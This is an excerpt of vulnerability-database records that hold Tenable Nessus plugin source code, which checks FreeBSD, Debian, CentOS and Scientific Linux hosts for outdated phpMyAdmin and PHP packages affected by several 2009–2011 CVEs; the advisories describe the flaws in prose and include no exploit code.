update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nIt was possible to manipulate the PHP session superglobal using some\nof the Swekey authentication code. This could open a path for other\nattacks.\n\nAn unsanitized key from the Servers array is written in a comment of\nthe generated config. An attacker can modify this key by modifying the\nSESSION superglobal array. This allows the attacker to close the\ncomment and inject code.\n\nThrough a possible bug in PHP running on Windows systems a NULL byte\ncan truncate the pattern string allowing an attacker to inject the /e\nmodifier causing the preg_replace function to execute its second\nargument as PHP code.\n\nFixed filtering of a file path in the MIME-type transformation code,\nwhich allowed for directory traversal.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://vuxml.freebsd.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a0813c94\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<3.4.3.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:43:35", "description": "Several vulnerabilities were discovered in phpMyAdmin, a tool to administrate MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2011-2505 Possible session manipulation in Swekey authentication.\n\n - CVE-2011-2506 Possible code injection in setup script, in case session variables are compromised.\n\n - CVE-2011-2507 Regular expression quoting issue in Synchronize code.\n\n - CVE-2011-2508 Possible directory traversal in MIME-type transformation.\n\n - CVE-2011-2642 Cross site scripting in table Print view when the attacker can create crafted table names.\n\n - No CVE name yet\n\n Possible superglobal and local variables manipulation in Swekey authentication. 
(PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642, which has been fixed in version 2.11.8.1-5+lenny9.", "cvss3": {}, "published": "2011-07-28T00:00:00", "type": "nessus", "title": "Debian DSA-2286-1 : phpmyadmin - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpmyadmin", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2286.NASL", "href": "https://www.tenable.com/plugins/nessus/55708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2286. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55708);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\");\n script_bugtraq_id(48563, 48874);\n script_xref(name:\"DSA\", value:\"2286\");\n\n script_name(english:\"Debian DSA-2286-1 : phpmyadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in phpMyAdmin, a tool to\nadministrate MySQL over the web. 
The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2011-2505\n Possible session manipulation in Swekey authentication.\n\n - CVE-2011-2506\n Possible code injection in setup script, in case session\n variables are compromised.\n\n - CVE-2011-2507\n Regular expression quoting issue in Synchronize code.\n\n - CVE-2011-2508\n Possible directory traversal in MIME-type\n transformation.\n\n - CVE-2011-2642\n Cross site scripting in table Print view when the\n attacker can create crafted table names.\n\n - No CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. (PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\nwhich has been fixed in version 2.11.8.1-5+lenny9.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/phpmyadmin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2286\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"phpmyadmin\", reference:\"3.3.7-6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:58", "description": "Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. 
If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : php (CESA-2010:0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php", "p-cpe:/a:centos:centos:php-bcmath", "p-cpe:/a:centos:centos:php-cli", "p-cpe:/a:centos:centos:php-common", "p-cpe:/a:centos:centos:php-dba", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-ncurses", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-pdo", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-soap", "p-cpe:/a:centos:centos:php-xml", "p-cpe:/a:centos:centos:php-xmlrpc", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/50862", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0919 and \n# CentOS Errata and Security Advisory 2010:0919 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50862);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n 
script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"CentOS 4 / 5 : php (CESA-2010:0919)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. 
(CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1573b130\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-December/017206.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f265b3da\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017197.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2b40099\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-November/017198.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?409943b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", 
reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif 
(rpm_check(release:\"CentOS-5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T14:48:26", 
"description": "An input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. 
A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAfter installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : php on SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101129_PHP_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60908);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n\n script_name(english:\"Scientific Linux Security Update : php on SL4.x, SL5.x i386/x86_64\");\n 